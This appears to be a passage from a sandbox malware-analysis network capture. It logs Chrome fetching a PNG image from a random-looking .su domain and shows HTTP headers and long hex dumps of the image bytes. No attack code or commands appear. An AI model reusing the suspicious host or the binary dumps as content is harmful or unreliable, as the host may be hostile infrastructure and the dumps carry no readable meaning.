                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SIKH6knTVuu0jnMKTIx9J6pcGjeI1MMRgKXNLrQt15VmAPMGRWcWbeNYp26Vxy1RI9YipkYUf68Pz2UkHHuilTUJqc900NY73jUs9hV6hu55HOpBYUmW9VjN76TNdwb%2FHybXgYcxoingM8c8Q8WluD9ccKMw"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 84a8ff71fd0fb111-ATL
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-01-24 14:34:32 UTC682INData Raw: 33 31 33 63 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 03 b0 00 00 01 b0 08 06 00 00 00 90 22 89 eb 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 09 70 48 59 73 00 00 0e c2 00 00 0e c2 01 15 28 4a 80 00 00 ff a5 49 44 41 54 78 5e ec fd d9 8e 2c c9 96 a6 89 a9 bb 8d ee be 23 ce 98 79 b2 b2 aa 51 53 83 04 d8 20 c0 e7 2b b2 80 7a 02 f2 96 17 7c 91 be 23 01 82 bc e0 05 0b 44 37 49 90 a8 aa 24 b2 33 2b a7 73 22 62 6f 1f 6c 76 fe df 5a b2 54 c5 d4 d5 cc cd dd cd f7 10 b1 be bd d5 55 55 54 66 11 15 91 5f 45 54 ed e2 ff f4 7f fd bf 3d 36 df 08 e3 d1 a8 1c 7d 1d 5c 5e 3e 8d cf 6e b7 1d 34 7f 4f c6 a3 cb 66 b3 dd b5 fb 9a 43 d7 38 7f 33 17 3d 3f 1e 3b ff 23 2c 0b 27 ec 55 d7 07 c1 de 73 76 7a 44 da
                                                          Data Ascii: 313cPNGIHDR"gAMAasRGBpHYs(JIDATx^,#yQS +z|#D7I$3+s"bolvZTUUTf_ET=6}\^>n4OfC83=?;#,'UsvzD
                                                          2024-01-24 14:34:32 UTC1369INData Raw: 65 ec 14 6e 6b f0 a7 9f e6 da de 21 f3 d7 12 63 30 c6 63 2f e1 ad f1 08 f7 e7 48 43 f2 f5 b0 dd ec d7 a3 d1 78 7f 8c 7f f1 3f fd cd df 5a 33 b7 53 95 bb 54 f5 63 1f 70 0e b5 d9 e7 60 d7 7b aa c5 00 bd 16 2d af e1 b2 3c 41 db ea df c5 b6 f3 eb 71 e4 69 ac cd 92 d7 f3 58 ea 4c cd 45 af fe 9c 62 27 18 b2 bb 59 af 9b 87 dd b8 9c fd b2 b9 ba dc 34 e3 c9 a4 9c 1d a7 ce e3 a1 7c 3d 06 6e 5f ea e6 39 86 fc 1c aa 2b 61 76 ce f0 4f 49 cf 7b 84 1b bc a7 df 6f a1 ce ff a1 b8 9d 92 6f a7 72 c8 af 3a 0e 7d ce 19 36 7c 89 fc 1f 4a 77 3f cd 71 fd a5 76 e1 4b a4 e9 a5 f4 d3 00 a7 c4 fb 14 77 43 76 82 d7 e6 0d 7e d6 6e fb 61 1c ba d6 37 7f 49 f8 c7 d2 01 e1 d7 90 bd 43 e1 1c 8b f7 10 a7 c6 a1 e6 98 9b 53 c3 ab d3 56 1f bf 85 7e d8 43 7e 0f d9 79 2d 87 fc c2 fc 39 7f fb f1
                                                          Data Ascii: enk!c0c/HCx?Z3STcp`{-<AqiXLEb'Y4|=n_9+avOI{oor:}6|Jw?qvKwCv~na7ICSV~C~y-9
                                                          2024-01-24 14:34:32 UTC1369INData Raw: 3b c7 cc 86 fc e8 13 4d c6 91 66 c5 c0 9e db 71 4f 79 c2 c5 b9 9b 87 2f 04 cc 75 dd 6a 0a dc 2b 54 2f 82 22 fc e2 69 14 f6 b8 c1 b8 39 b1 5f 3f 25 b2 4e aa 6e d4 2a ba 0a ea 60 6f 5b c4 eb 52 42 f5 76 b9 6b 3e de af 9a 7f 78 90 70 bd bb 6d ee 1e a7 cd ed fa 84 0c 29 c4 c7 22 62 1f 66 35 43 1f 6b e8 bb 1b f2 07 fa e7 80 d9 b9 08 bf 3f 4c 3c ff 7f 33 7f 6c 7e 73 73 d5 fc 46 02 f6 c3 f4 a2 f9 30 47 c0 3e 36 23 b5 30 27 35 32 6a 95 a2 03 a9 73 d1 9c 96 b2 38 77 63 95 24 a7 72 ea d3 e5 6f 9d 68 f7 0e b5 8b f0 b5 e6 c5 50 9b 1d 1c 6b eb e1 b9 eb 7d 4e c9 27 18 f2 f7 a5 61 9d 42 c4 07 5f 23 17 08 e3 d4 78 1e 03 3f c2 df da 9f 3a 1d fd 70 ac 29 2f 0d f9 fe 31 8d f8 69 0d 79 df 6f 8f 83 7b 14 e2 81 ba 08 6e ce b8 60 3f 7e fb 39 f2 1c 25 92 3d 62 2c b2 8f db e5 da
                                                          Data Ascii: ;MfqOy/uj+T/"i9_?%Nn*`o[RBvk>xpm)"bf5Ck?L<3l~ssF0G>6#0'52js8wc$rohPk}N'aB_#x?:p)/1iyo{n`?~9%=b,
                                                          2024-01-24 14:34:32 UTC1369INData Raw: 47 d5 8f c4 b3 8c 98 e5 dc 7c b5 18 b1 b8 46 70 ae 57 cd 52 7b 04 e6 72 81 30 7d 68 1e 74 fc c0 fe c0 66 e2 14 61 ca be de cc 6c 7f c3 4f 36 13 bb 0a 0b 91 6b cb 9e 25 4e 11 a8 b1 31 43 bb 5e 6f e4 cf aa c4 4b 62 56 e6 af 7d 78 92 24 49 92 24 49 92 7c bd 7c 55 02 96 f1 a6 6f 3e f0 f4 59 9f d3 66 f1 dc 5d 39 f9 c2 74 f1 fe f2 f1 8a b8 30 d0 f7 f7 13 bb 2d 04 80 9f d7 f1 f5 e3 d7 f2 16 b7 35 fd f7 5f fb 84 00 3d 04 d7 11 86 f1 e5 de d8 10 a0 08 54 b7 f3 54 30 86 9b 6b 73 7f d9 fc e1 bb f9 de c6 17 80 d9 42 d0 86 9f fd 2d 44 6e 2d 4e bb 4d f9 f4 ff fa ef 9b bb ff e3 ff be 88 eb 4e 54 47 9c 9e 83 af 30 bf 06 74 e9 85 d2 37 96 90 bd 1c 8d 9b 4b ed f9 b9 9c b1 8e c7 63 ff f9 9c 8b d1 44 e6 12 b2 8a 0a b1 b9 68 bc 1e f9 72 5e 44 ec ba 59 2f 59 76 bc 6c 56 08 4d
                                                          Data Ascii: G|FpWR{r0}htfalO6k%N1C^oKbV}x$I$I||Uo>Yf]9t0-5_=TT0ksB-Dn-NMNTG0t7KcDhr^DY/YvlVM
                                                          2024-01-24 14:34:32 UTC1369INData Raw: 49 70 1d a2 16 b1 61 0f 33 44 2c 33 b1 cc c2 1e 12 b0 40 fc 98 0d 86 7a 46 f8 3d 05 2c 65 c4 17 83 99 51 dd f2 9e a9 2d b9 45 00 5e 48 2c 4e 9a ab f9 95 ee 21 ea d7 d8 ca 90 fa 84 e8 e5 1d 53 7f 3f 95 f7 5f 17 ad 80 45 fc 72 bd 2f 42 87 08 11 8b 38 e5 7e a5 ee fa 87 97 ba 72 00 ea bb d5 3b d9 99 21 5c 2b 01 8b b0 8e fb c8 ea b7 fc 20 8e 26 6a d5 d6 4c 54 0e dc 1f af ad 7f 49 92 24 49 92 24 c9 d7 c9 51 01 1b 83 56 fb ba e8 ed 4f cd 4f f7 fe 7e 1a 83 cd 98 1d 61 c0 ca cc 0c 20 5c 27 1a 5c 4e 67 57 12 b0 3e fb c7 cc 08 20 84 18 6f 32 46 dd 31 58 65 d0 2f 51 61 30 08 56 58 6c 63 06 9c 32 df c9 1d 1f 63 81 98 85 31 01 18 6e 44 3b ab 18 7b 81 80 26 ac 9b ab ab 66 a4 01 38 ac ef 6f 9b bb e5 5a e9 58 5a 7c 47 8a e7 d5 5c e2 8c 70 8a a0 66 b6 0f 22 8e 11 27 8d 80
                                                          Data Ascii: Ipa3D,3@zF=,eQ-E^H,N!S?_Er/B8~r;!\+ &jLTI$I$QVOO~a \'\NgW> o2F1Xe/Qa0VXlc2c1nD;{&f8oZXZ|G\pf"'
                                                          2024-01-24 14:34:32 UTC1369INData Raw: 6b 05 2c 33 b1 b1 84 f8 d4 59 ad f7 9e 81 fd 4f 3f 2c 9b ff ef 1f 97 27 09 58 e8 8b c4 e0 90 80 85 10 b1 41 fd be 6a 4d bc bb 7a 88 fe 7b b6 87 c2 7c 2e 0d 01 76 e3 43 53 6f 9e 81 15 b5 88 0d 6c 19 3e 0f 4a 0e b9 2f 22 36 3e ea 66 cb e8 d9 cb 9c 7a 87 7f d4 41 ee 3d 04 2c f5 26 ea ce 90 80 a5 2d e0 e3 65 5c 8b 07 30 08 57 ab cb 65 8b 0f b3 bd a4 1e 26 49 92 24 49 92 24 3f 3f 8e 8e 04 35 0c b5 fd e3 a5 8f e4 99 2d 44 f8 d5 1b 82 35 84 5d ec 19 90 0e 8a 35 99 ef ed 45 08 c8 1a 66 57 ec f7 28 4d 50 49 3c 4d 5c 40 f1 21 97 58 46 88 e0 42 c8 61 27 66 60 fb 20 ec 18 08 33 18 e7 3a 62 2d 84 a1 85 5b e2 58 8b d5 21 e1 7a 8c b0 cf 9e 74 84 9f b1 c4 19 42 cc 86 b8 1d a2 9f 07 30 64 16 20 16 78 47 54 5a c1 44 44 2c 09 e6 47 8b 3c cd 08 79 cf 43 8e d9 b7 f9 a6 2d ca
                                                          Data Ascii: k,3YO?,'XAjMz{|.vCSol>J/"6>fzA=,&-e\0We&I$I$??5-D5]5EfW(MPI<M\@!XFBa'f` 3:b-[X!ztB0d xGTZDD,G<yC-
                                                          2024-01-24 14:34:32 UTC1369INData Raw: 6a 25 d4 23 de 23 c5 87 34 f5 d9 2a 2e 72 24 37 78 ef 33 96 16 7e 0d a2 51 82 97 f8 f1 d3 44 d8 35 01 ab 4d 9e 36 97 32 40 44 cb 86 09 e5 cb b1 04 2c 76 89 96 fc b2 07 0b 0a a3 86 2f cd 46 38 96 76 2c 5b de 20 a8 3d 7f 3c de be 24 9a 9f ed 39 fa 51 9f 1e b8 0f 61 df fa ff 0a f0 07 01 bb de 74 bf 05 fb c3 dd 43 f3 d7 9f 9a e6 9f 3e 2e 9b bf 7f 70 7f 1f 36 bf 8c 19 58 e0 9d 57 e0 5d e0 5f 4b b0 fe eb 5f 5f 36 bf b9 b9 6a a4 61 db e5 c3 4c c0 a7 80 4d 92 24 49 92 24 49 7e 8e 9c 24 60 c1 c4 2a 02 8d d9 43 89 2a 9b b5 8c 73 d1 ce 44 9a a0 c2 0c e1 62 46 46 98 ed cd c4 ca 0c 2b 08 2a 8e c1 84 9a ce 99 39 8d 99 ce 3d 11 54 85 09 26 1c e5 96 f7 4b cd 1f 61 1f 2f 42 e0 95 78 9a e0 25 5c 39 b3 99 4e 6d b6 2f ec 0b ac 2e 8e 17 c5 4e f8 bb 17 df 42 b8 25 7d f5 06 88
                                                          Data Ascii: j%##4*.r$7x3~QD5M62@D,v/F8v,[ =<$9QatC>.p6XW]_K__6jaLM$I$I~$`*C*sDbFF+*9=T&Ka/Bx%\9Nm/.NB%}
                                                          2024-01-24 14:34:32 UTC1369INData Raw: 1e 2e 6f ef 17 26 5c ff fe e3 a2 f9 f1 61 d3 7c bc bb 37 11 cb 92 e2 58 56 dc 87 99 d9 78 77 36 df 9b 4d fa b0 62 98 e5 c3 b6 8e 38 49 92 24 49 92 24 49 92 e4 4c 5c 2e 77 e3 66 b9 5a 35 77 9b c7 e6 87 bb 55 f3 b0 bd 6c 96 eb 4d 99 81 bd 78 22 4c 39 67 66 96 25 c6 9b cd d6 b7 32 5b 9b 22 36 71 ca b2 61 a9 d8 7c ff 35 49 92 24 49 92 24 49 92 73 71 89 58 45 b4 ae 96 eb e6 61 b5 35 21 0b bb ed d6 f6 35 ad 78 35 e1 ba 69 96 52 ae 6c fe ce ec 69 22 d6 3e f0 73 60 4b 01 fc f3 23 cb 34 49 92 24 49 92 24 49 92 73 d1 fe 0e ec 73 b0 4c 98 59 d7 d5 6a 6d a2 f5 6e b9 6d 6e 1f 96 b6 dd 69 bb 5f 21 66 1f 8f 7e fc 09 d1 bb 5e af e5 c7 aa dd 96 cb a5 f9 b9 d6 b5 cd 66 65 76 36 db 4e d4 6e 25 a4 87 b6 5a f8 d6 5b fe 6c cb d7 46 96 47 92 24 49 92 24 49 92 24 e7 e1 e2 ff fe
                                                          Data Ascii: .o&\a|7XVxw6Mb8I$I$IL\.wfZ5wUlMx"L9gf%2["6qa|5I$I$IsqXEa5!5x5iRli">s`K#4I$I$IssLYjmnmni_!f~^fev6Nn%Z[lFG$I$I$
                                                          2024-01-24 14:34:32 UTC1369INData Raw: bd 3a c5 3e cb 83 11 44 b2 8f f0 ad 7f 1f 76 74 e9 cb 90 f9 fa f0 64 3c 49 e1 f4 85 08 01 0b d4 9f 5c ca 9d 24 49 92 24 49 92 24 c9 39 38 2a 60 11 a2 fc 14 0e b3 a4 21 62 d9 83 2d 1f ae be 42 cc ef bf 02 c2 15 77 b5 78 0d 10 36 2e 6e 8a 02 2e e0 7f 08 9e 56 d8 0a 17 3e e1 81 9b b7 62 48 f6 30 d9 b7 7f d9 8c ec f7 64 f9 89 9f 62 98 7c 76 28 12 66 c6 6d 06 bd 6c 49 92 24 49 92 24 49 92 24 6f e5 e2 ff f9 37 b7 8f 1f ef ee 9b bf fd e8 c2 74 3a 9b 98 80 fd cb df cc 9b eb a9 2f 01 06 5b ea cb 2c ea 0e 41 eb 33 af 97 97 a3 bd 63 df b3 8c f8 c2 be 0e 75 8a 6e 71 01 8a 80 f5 f3 53 c0 df 43 f6 53 30 7d 79 ea 77 60 b3 3c 92 24 49 92 24 49 92 24 39 17 17 ff e9 bf fe f8 f8 71 d9 34 cc c2 de 6d 1e 9b 1b 89 cf 3f 7c 3f 6f 7e f7 61 6c 02 56 ff 5b 36 bc 6c 2a f8 7d d7 21
                                                          Data Ascii: :>Dvtd<I\$I$I$98*`!b-Bwx6.n.V>bH0db|v(fmlI$I$I$o7t:/[,A3cunqSCS0}yw`<$I$I$9q4m?|?o~alV[6l*}!
                                                          2024-01-24 14:34:32 UTC978INData Raw: f7 98 2f bf 26 49 92 24 49 92 24 c9 39 39 49 c0 22 52 f9 12 2c 33 61 eb 32 b8 5f db 80 5f 62 c0 de 03 94 00 d8 76 62 f6 90 6e b1 25 a1 83 1b ee 7c d6 4e ff 0f c2 75 c2 b0 9f 2f 29 ef 1f 76 61 9e 57 2c 25 6f c7 67 5e df 28 e2 f8 92 12 82 58 e2 75 36 f2 f7 58 99 e9 64 d6 13 11 fb dd 77 1f 6c 0b 86 44 ed d0 d2 62 a3 37 33 1a b3 b5 50 cf dc c6 86 30 ad b7 30 07 66 75 89 63 3d db 7a a1 3a 9d 24 49 92 24 49 92 24 c9 f9 78 76 09 31 c2 d0 66 a7 b4 d9 4c 95 c4 2a f0 b3 21 97 bc 53 38 f6 41 fb e5 e5 a8 b9 90 d8 e0 d8 bf bc fa 74 e9 28 62 93 ad 8f 7d dd d5 74 8a ff 76 e6 31 b7 36 13 1c 9f 85 15 cc c8 29 60 77 5b 9c 0c b9 4f 3e 1f fe 20 c2 cb e8 ad cb 67 29 6f 1e 9e 2c 17 8b e6 d3 dd 5d 73 7f fb c9 7e 46 e7 fe fe 61 6f f6 14 62 46 34 66 4f 6b 11 1a b3 a2 f6 1e 2b 75
                                                          Data Ascii: /&I$I$99I"R,3a2__bvbn%|Nu/)vaW,%og^(Xu6XdwlDb73P00fuc=z:$I$I$xv1fL*!S8At(b}tv16)`w[O> g)o,]s~FaobF4fOk+u


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          47192.168.2.649771104.21.21.1794432104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-01-24 14:34:32 UTC455OUTGET /VDgyaQMqDddyxrJrBbYdMwrE/6CtriZAVvTVfZo/24z5NeChfvx HTTP/1.1
                                                          Host: iajjfhkbqnkrnryejn.ypiqzxx7wocs.su
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: PHPSESSID=egfnet9pnqrimeoqe9hrn6khcn
                                                          2024-01-24 14:34:32 UTC685INHTTP/1.1 200 OK
                                                          Date: Wed, 24 Jan 2024 14:34:32 GMT
                                                          Content-Type: image/png
                                                          Content-Length: 137933
                                                          Connection: close
                                                          expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          cache-control: no-store, no-cache, must-revalidate
                                                          pragma: no-cache
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PA776AjIjZsCSkXXHAK3HBoOj0fkTmVpoE7Beqi83LkrjGx3qMK5769eFIxpFjX12v8RYnUe%2FZvEFsIwBaBjkmyhHAbRh96rOozBLXhw9h9BemsKOpBvPwdqOlHBVEqByBJNCDeQBpQBtoA5lGAy5%2F8B17rC"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 84a8ff721cee07ea-ATL
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-01-24 14:34:32 UTC684INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 03 b0 00 00 01 b0 08 06 00 00 00 90 22 89 eb 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 09 70 48 59 73 00 00 0e c2 00 00 0e c2 01 15 28 4a 80 00 00 ff a5 49 44 41 54 78 5e ec fd d9 8e 2c c9 96 a6 89 a9 bb 8d ee be 23 ce 98 79 b2 b2 aa 51 53 83 04 d8 20 c0 e7 2b b2 80 7a 02 f2 96 17 7c 91 be 23 01 82 bc e0 05 0b 44 37 49 90 a8 aa 24 b2 33 2b a7 73 22 62 6f 1f 6c 76 fe df 5a b2 54 c5 d4 d5 cc cd dd cd f7 10 b1 be bd d5 55 55 54 66 11 15 91 5f 45 54 ed e2 ff f4 7f fd bf 3d 36 df 08 e3 d1 a8 1c 7d 1d 5c 5e 3e 8d cf 6e b7 1d 34 7f 4f c6 a3 cb 66 b3 dd b5 fb 9a 43 d7 38 7f 33 17 3d 3f 1e 3b ff 23 2c 0b 27 ec 55 d7 07 c1 de 73 76 7a 44 da f6 e8 c7 0b f0 37
                                                          Data Ascii: PNGIHDR"gAMAasRGBpHYs(JIDATx^,#yQS +z|#D7I$3+s"bolvZTUUTf_ET=6}\^>n4OfC83=?;#,'UsvzD7
                                                          2024-01-24 14:34:32 UTC1369INData Raw: e6 da de 21 f3 d7 12 63 30 c6 63 2f e1 ad f1 08 f7 e7 48 43 f2 f5 b0 dd ec d7 a3 d1 78 7f 8c 7f f1 3f fd cd df 5a 33 b7 53 95 bb 54 f5 63 1f 70 0e b5 d9 e7 60 d7 7b aa c5 00 bd 16 2d af e1 b2 3c 41 db ea df c5 b6 f3 eb 71 e4 69 ac cd 92 d7 f3 58 ea 4c cd 45 af fe 9c 62 27 18 b2 bb 59 af 9b 87 dd b8 9c fd b2 b9 ba dc 34 e3 c9 a4 9c 1d a7 ce e3 a1 7c 3d 06 6e 5f ea e6 39 86 fc 1c aa 2b 61 76 ce f0 4f 49 cf 7b 84 1b bc a7 df 6f a1 ce ff a1 b8 9d 92 6f a7 72 c8 af 3a 0e 7d ce 19 36 7c 89 fc 1f 4a 77 3f cd 71 fd a5 76 e1 4b a4 e9 a5 f4 d3 00 a7 c4 fb 14 77 43 76 82 d7 e6 0d 7e d6 6e fb 61 1c ba d6 37 7f 49 f8 c7 d2 01 e1 d7 90 bd 43 e1 1c 8b f7 10 a7 c6 a1 e6 98 9b 53 c3 ab d3 56 1f bf 85 7e d8 43 7e 0f d9 79 2d 87 fc c2 fc 39 7f fb f1 3a 85 73 c6 fd 14 ea f0
                                                          Data Ascii: !c0c/HCx?Z3STcp`{-<AqiXLEb'Y4|=n_9+avOI{oor:}6|Jw?qvKwCv~na7ICSV~C~y-9:s
                                                          2024-01-24 14:34:32 UTC1369INData Raw: c6 91 66 c5 c0 9e db 71 4f 79 c2 c5 b9 9b 87 2f 04 cc 75 dd 6a 0a dc 2b 54 2f 82 22 fc e2 69 14 f6 b8 c1 b8 39 b1 5f 3f 25 b2 4e aa 6e d4 2a ba 0a ea 60 6f 5b c4 eb 52 42 f5 76 b9 6b 3e de af 9a 7f 78 90 70 bd bb 6d ee 1e a7 cd ed fa 84 0c 29 c4 c7 22 62 1f 66 35 43 1f 6b e8 bb 1b f2 07 fa e7 80 d9 b9 08 bf 3f 4c 3c ff 7f 33 7f 6c 7e 73 73 d5 fc 46 02 f6 c3 f4 a2 f9 30 47 c0 3e 36 23 b5 30 27 35 32 6a 95 a2 03 a9 73 d1 9c 96 b2 38 77 63 95 24 a7 72 ea d3 e5 6f 9d 68 f7 0e b5 8b f0 b5 e6 c5 50 9b 1d 1c 6b eb e1 b9 eb 7d 4e c9 27 18 f2 f7 a5 61 9d 42 c4 07 5f 23 17 08 e3 d4 78 1e 03 3f c2 df da 9f 3a 1d fd 70 ac 29 2f 0d f9 fe 31 8d f8 69 0d 79 df 6f 8f 83 7b 14 e2 81 ba 08 6e ce b8 60 3f 7e fb 39 f2 1c 25 92 3d 62 2c b2 8f db e5 da 10 5d c8 ea d7 06 dd 07
                                                          Data Ascii: fqOy/uj+T/"i9_?%Nn*`o[RBvk>xpm)"bf5Ck?L<3l~ssF0G>6#0'52js8wc$rohPk}N'aB_#x?:p)/1iyo{n`?~9%=b,]
                                                          2024-01-24 14:34:32 UTC1369INData Raw: dc 7c b5 18 b1 b8 46 70 ae 57 cd 52 7b 04 e6 72 81 30 7d 68 1e 74 fc c0 fe c0 66 e2 14 61 ca be de cc 6c 7f c3 4f 36 13 bb 0a 0b 91 6b cb 9e 25 4e 11 a8 b1 31 43 bb 5e 6f e4 cf aa c4 4b 62 56 e6 af 7d 78 92 24 49 92 24 49 92 7c bd 7c 55 02 96 f1 a6 6f 3e f0 f4 59 9f d3 66 f1 dc 5d 39 f9 c2 74 f1 fe f2 f1 8a b8 30 d0 f7 f7 13 bb 2d 04 80 9f d7 f1 f5 e3 d7 f2 16 b7 35 fd f7 5f fb 84 00 3d 04 d7 11 86 f1 e5 de d8 10 a0 08 54 b7 f3 54 30 86 9b 6b 73 7f d9 fc e1 bb f9 de c6 17 80 d9 42 d0 86 9f fd 2d 44 6e 2d 4e bb 4d f9 f4 ff fa ef 9b bb ff e3 ff be 88 eb 4e 54 47 9c 9e 83 af 30 bf 06 74 e9 85 d2 37 96 90 bd 1c 8d 9b 4b ed f9 b9 9c b1 8e c7 63 ff f9 9c 8b d1 44 e6 12 b2 8a 0a b1 b9 68 bc 1e f9 72 5e 44 ec ba 59 2f 59 76 bc 6c 56 08 4d 09 4b 44 e9 90 68 7d 78
                                                          Data Ascii: |FpWR{r0}htfalO6k%N1C^oKbV}x$I$I||Uo>Yf]9t0-5_=TT0ksB-Dn-NMNTG0t7KcDhr^DY/YvlVMKDh}x
                                                          2024-01-24 14:34:32 UTC1369INData Raw: 33 44 2c 33 b1 cc c2 1e 12 b0 40 fc 98 0d 86 7a 46 f8 3d 05 2c 65 c4 17 83 99 51 dd f2 9e a9 2d b9 45 00 5e 48 2c 4e 9a ab f9 95 ee 21 ea d7 d8 ca 90 fa 84 e8 e5 1d 53 7f 3f 95 f7 5f 17 ad 80 45 fc 72 bd 2f 42 87 08 11 8b 38 e5 7e a5 ee fa 87 97 ba 72 00 ea bb d5 3b d9 99 21 5c 2b 01 8b b0 8e fb c8 ea b7 fc 20 8e 26 6a d5 d6 4c 54 0e dc 1f af ad 7f 49 92 24 49 92 24 c9 d7 c9 51 01 1b 83 56 fb ba e8 ed 4f cd 4f f7 fe 7e 1a 83 cd 98 1d 61 c0 ca cc 0c 20 5c 27 1a 5c 4e 67 57 12 b0 3e fb c7 cc 08 20 84 18 6f 32 46 dd 31 58 65 d0 2f 51 61 30 08 56 58 6c 63 06 9c 32 df c9 1d 1f 63 81 98 85 31 01 18 6e 44 3b ab 18 7b 81 80 26 ac 9b ab ab 66 a4 01 38 ac ef 6f 9b bb e5 5a e9 58 5a 7c 47 8a e7 d5 5c e2 8c 70 8a a0 66 b6 0f 22 8e 11 27 8d 80 4d 08 43 b1 62 c2 97 41
                                                          Data Ascii: 3D,3@zF=,eQ-E^H,N!S?_Er/B8~r;!\+ &jLTI$I$QVOO~a \'\NgW> o2F1Xe/Qa0VXlc2c1nD;{&f8oZXZ|G\pf"'MCbA
                                                          2024-01-24 14:34:32 UTC1369INData Raw: d4 59 ad f7 9e 81 fd 4f 3f 2c 9b ff ef 1f 97 27 09 58 e8 8b c4 e0 90 80 85 10 b1 41 fd be 6a 4d bc bb 7a 88 fe 7b b6 87 c2 7c 2e 0d 01 76 e3 43 53 6f 9e 81 15 b5 88 0d 6c 19 3e 0f 4a 0e b9 2f 22 36 3e ea 66 cb e8 d9 cb 9c 7a 87 7f d4 41 ee 3d 04 2c f5 26 ea ce 90 80 a5 2d e0 e3 65 5c 8b 07 30 08 57 ab cb 65 8b 0f b3 bd a4 1e 26 49 92 24 49 92 24 3f 3f 8e 8e 04 35 0c b5 fd e3 a5 8f e4 99 2d 44 f8 d5 1b 82 35 84 5d ec 19 90 0e 8a 35 99 ef ed 45 08 c8 1a 66 57 ec f7 28 4d 50 49 3c 4d 5c 40 f1 21 97 58 46 88 e0 42 c8 61 27 66 60 fb 20 ec 18 08 33 18 e7 3a 62 2d 84 a1 85 5b e2 58 8b d5 21 e1 7a 8c b0 cf 9e 74 84 9f b1 c4 19 42 cc 86 b8 1d a2 9f 07 30 64 16 20 16 78 47 54 5a c1 44 44 2c 09 e6 47 8b 3c cd 08 79 cf 43 8e d9 b7 f9 a6 2d ca 8f 63 cc 5b 7b 3c 00 d8
                                                          Data Ascii: YO?,'XAjMz{|.vCSol>J/"6>fzA=,&-e\0We&I$I$??5-D5]5EfW(MPI<M\@!XFBa'f` 3:b-[X!ztB0d xGTZDD,G<yC-c[{<
                                                          2024-01-24 14:34:32 UTC1369INData Raw: 34 f5 d9 2a 2e 72 24 37 78 ef 33 96 16 7e 0d a2 51 82 97 f8 f1 d3 44 d8 35 01 ab 4d 9e 36 97 32 40 44 cb 86 09 e5 cb b1 04 2c 76 89 96 fc b2 07 0b 0a a3 86 2f cd 46 38 96 76 2c 5b de 20 a8 3d 7f 3c de be 24 9a 9f ed 39 fa 51 9f 1e b8 0f 61 df fa ff 0a f0 07 01 bb de 74 bf 05 fb c3 dd 43 f3 d7 9f 9a e6 9f 3e 2e 9b bf 7f 70 7f 1f 36 bf 8c 19 58 e0 9d 57 e0 5d e0 5f 4b b0 fe eb 5f 5f 36 bf b9 b9 6a a4 61 db e5 c3 4c c0 a7 80 4d 92 24 49 92 24 49 7e 8e 9c 24 60 c1 c4 2a 02 8d d9 43 89 2a 9b b5 8c 73 d1 ce 44 9a a0 c2 0c e1 62 46 46 98 ed cd c4 ca 0c 2b 08 2a 8e c1 84 9a ce 99 39 8d 99 ce 3d 11 54 85 09 26 1c e5 96 f7 4b cd 1f 61 1f 2f 42 e0 95 78 9a e0 25 5c 39 b3 99 4e 6d b6 2f ec 0b ac 2e 8e 17 c5 4e f8 bb 17 df 42 b8 25 7d f5 06 88 c0 88 7b 1b 86 f6 96 77
                                                          Data Ascii: 4*.r$7x3~QD5M62@D,v/F8v,[ =<$9QatC>.p6XW]_K__6jaLM$I$I~$`*C*sDbFF+*9=T&Ka/Bx%\9Nm/.NB%}{w
                                                          2024-01-24 14:34:32 UTC1369INData Raw: fe e3 a2 f9 f1 61 d3 7c bc bb 37 11 cb 92 e2 58 56 dc 87 99 d9 78 77 36 df 9b 4d fa b0 62 98 e5 c3 b6 8e 38 49 92 24 49 92 24 49 92 e4 4c 5c 2e 77 e3 66 b9 5a 35 77 9b c7 e6 87 bb 55 f3 b0 bd 6c 96 eb 4d 99 81 bd 78 22 4c 39 67 66 96 25 c6 9b cd d6 b7 32 5b 9b 22 36 71 ca b2 61 a9 d8 7c ff 35 49 92 24 49 92 24 49 92 73 71 89 58 45 b4 ae 96 eb e6 61 b5 35 21 0b bb ed d6 f6 35 ad 78 35 e1 ba 69 96 52 ae 6c fe ce ec 69 22 d6 3e f0 73 60 4b 01 fc f3 23 cb 34 49 92 24 49 92 24 49 92 73 d1 fe 0e ec 73 b0 4c 98 59 d7 d5 6a 6d a2 f5 6e b9 6d 6e 1f 96 b6 dd 69 bb 5f 21 66 1f 8f 7e fc 09 d1 bb 5e af e5 c7 aa dd 96 cb a5 f9 b9 d6 b5 cd 66 65 76 36 db 4e d4 6e 25 a4 87 b6 5a f8 d6 5b fe 6c cb d7 46 96 47 92 24 49 92 24 49 92 24 e7 e1 e2 ff fe 57 3f 3e f2 ee ab 2d 1f
                                                          Data Ascii: a|7XVxw6Mb8I$I$IL\.wfZ5wUlMx"L9gf%2["6qa|5I$I$IsqXEa5!5x5iRli">s`K#4I$I$IssLYjmnmni_!f~^fev6Nn%Z[lFG$I$I$W?>-
